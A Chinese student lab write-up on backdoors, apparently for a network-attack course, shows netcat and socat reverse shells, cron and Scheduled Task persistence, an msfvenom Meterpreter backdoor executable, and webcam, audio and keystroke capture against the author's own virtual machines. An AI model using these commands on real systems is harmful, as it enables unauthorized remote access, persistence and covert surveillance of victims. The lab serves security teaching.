2018-2019-2 《網絡對抗技術》Exp2 後門原理與應用 20165211

後門原理與應用


實驗內容

  1. 使用netcat獲取主機操做Shell,cron啓動
  2. 使用Socat獲取主機操做Shell, 任務計劃啓動
  3. 使用MSF meterpreter(或其餘軟件)生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell
  4. 使用MSF meterpreter(或其餘軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權

基礎問題回答

  1. 例舉你能想到的一個後門進入到你係統中的可能方式?linux

    1. 在網上下載的一些軟件,會帶有後門
    2. 系統會自帶後門
    3. 經過U盤傳播
  2. 例舉你知道的後門如何啓動起來(win及linux)的方式?git

    1. windows的定時任務
    2. linux的cron
    3. 社會工程學,讓用戶點擊運行
  3. Meterpreter有哪些給你映像深入的功能?shell

    1. 開始界面真的很酷炫???(咳咳咳……
    2. 攝像頭權限的得到,平時我本身的電腦通常都是處於開啓或者休眠的狀態(從新開機,啓動軟件太麻煩),攝像頭權限一旦被他人得到,會暴露本身的隱私,生活環境,有一種時刻會被人監視的詭異感(=.=|……
  4. 如何發現本身有系統有沒有被安裝後門?windows

    1. 安裝殺毒軟件,定時檢查本身的電腦安全

    2. 保持本身電腦的windows defender處於開啓的狀態服務器

      可以及時的發現後門,並刪除。網絡


經常使用後門工具

Netcat

參考資料:tcp

Netcat簡介工具

Linux系統終端命令:netcat的基本使用

關於netcat,找了一些專門介紹的博客,netcat是一個經過TCP/UDP在網絡中進行讀寫數據工具,被稱爲「瑞士軍刀」,主要用於調試領域、傳輸領域甚至黑客攻擊領域。利用該工具,能夠將網絡中一端的數據完整的發送至另外一臺主機終端顯示或存儲,常見的應用爲文件傳輸、與好友即時通訊、傳輸流媒體或者做爲用來驗證服務器的獨立的客戶端。

主要功能

  • 支持連出和連入(outbound and inbound connection),TCP和UDP,任意源和目的端口
  • 所有DNS正向/反向檢查,給出恰當的警告
  • 使用任何源端口
  • 使用任何本地設置的網絡資源地址
  • 內建端口掃描功能,帶有隨機數發生器
  • 內建loose source-routing功能
  • 可能標準輸入讀取命令行參數
  • 慢發送模式,每N秒發送一行
  • 以16進制顯示傳送或接收的數據
  • 容許其它程序服務創建鏈接,可選
  • 對Telnet應答,可選

netcat在kali裏能夠直接使用,windows中須要下載後使用(Socat同理)。

它的簡單使用過程在下面實踐過程記錄中會有詳細的介紹。

Socat

參考資料:

socat的安裝與使用

Netcat++,超級netcat工具

MSFmeterpreter

參考資料:

後滲透之meterpreter使用攻略

這是一個生成後門程序的平臺,把後門的基本功能(基本的鏈接、執行指令),擴展功能(如蒐集用戶信息、安裝服務等功能),編碼模式,運行平臺,以及運行參數,全都作成零件或可調整的參數。用的時候按須要組合,就能夠生成一個可執行文件。

本次實驗主要用Metaspolit的msfvenom指令來生成一個後門可執行文件。


實踐過程記錄

寫在前面的話:在本次實驗中我一開始用的是本機做爲windows端,可是因爲個人win10是家庭版,windows defender不能徹底關閉,在設置文件夾信任以後,權限又出現了問題,因此,後來在完成任務四時,切到了虛擬機來完成。如下是個人三個端的IP地址

本機windows 172.16.2.51

虛擬機kali 192.168.139.138

虛擬機windows7 192.168.139.140

1.後門工具熟悉

1.1Win得到Linux Shell

  1. windows端進入netcat文件的位置,使用命令行輸入 ncat.exe -l -p 5211,打開監聽,其中,5211爲監聽的端口。

  1. linux端在命令行輸入 nc 192.168.20.175 5211 -e /bin/sh,反彈鏈接Windows端。

  1. 此時windows下就已經得到了linux shell,能夠經過windows端的命令行實現對linux的操做啦~

1.2Linux得到Win Shell

這個操做與上一個操做相似了,如下主要過程:

  1. Linux運行監聽指令,指令爲:nc -l -p 5211

  1. windows反彈鏈接linux,指令爲 :ncat.exe -e cmd.exe 192.168.139.138 5211

  1. 此時linux下就得到了windows的控制權,能夠經過linux來控制windows主機了

1.3使用netcat傳輸數據

  1. 在windows下輸入命令:ncat.exe -l 5211,實現監聽5211端口

  1. Kali下輸入ncat 172.16.2.51 5211,鏈接到windows的5211端口,輸入一些數據

  1. 隨後咱們就能夠看到,已經實現了linux和windows之間的數據傳輸啦~

2.使用netcat獲取主機操做Shell,cron啓動

Cron是Linux下的定時任務,每一分鐘運行一次,根據配置文件執行預設的指令

  1. windows端下,輸入命令ncat.exe -l -p 5211,監聽本機的5211端口。

  1. 在kali端下,輸入crontab -e,實現編輯一條定時任務。

  2. 打開後,在最後一行添加 命令 05 * * * * /bin/netcat 172.16.2.51 5211 -e /bin/sh,即爲每小時的5分運行此命令。

  1. 此時,能夠看到,在windows端已經得到了linux的shell(ls 輸多了的後果……

3.使用Socat獲取主機操做Shell, 任務計劃啓動

  1. 在windows系統下,計算機管理-->任務計劃程序-->建立任務

  2. 新建觸發器,選擇,當工做站鎖定時。

  3. 在操做中,將程序或腳本中選擇socat.exe路徑,參數一欄填寫tcp-listen:5211 exec:cmd.exe,pty,stderr

  1. 完成建立,便可在將Windows主機鎖定重啓以後,查看任務欄工做狀態,發現咱們新建的任務已經開始運行。

  1. 在kali環境下輸入socat - tcp:172.16.2.51:5211,便可得到windows的shell。

4. 使用MSF meterpreter(或其餘軟件)生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell

  1. 使用msfvenom指令生成一個後門程序。msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.138 LPORT=5211 -f exe > 20165211_Akashi.exe

  1. 經過nc將生成的可執行文件發送到目標windows端

    Kali端:

windows端:

kali端:

  1. kali端使用msfconsole指令進入msf控制檯,設置各項參數。執行監聽

  1. 在windows端運行後門程序

  1. 則此時在kali上已經得到Windows的shell

5.使用MSF meterpreter(或其餘軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權

  1. 獲取目標主機音頻

  1. 獲取目標主機攝像頭

  1. 獲取目標主機擊鍵記錄


實驗總結與體會

遇到問題

在嘗試獲取主機攝像頭時,出現了以下錯誤

檢查後發現,虛擬的攝像頭未分配,將虛擬機的攝像頭打開後便可正常運行。

實驗體會

在本次實驗中,在體驗了MSF的功能以後,雖然是一場本身打本身的過程,可是在現實中,若是不注意信息安全,沒有安全意識,這樣簡單的過程,其實徹底能夠完成一場完整的黑客行爲。(默默關掉了攝像頭……)

仍是要注意本身的信息安全,不隨意使用來路不明的U盤,不點擊有危險的文件,網絡危機四伏,仍是要時刻注意的。

相關文章
相關標籤/搜索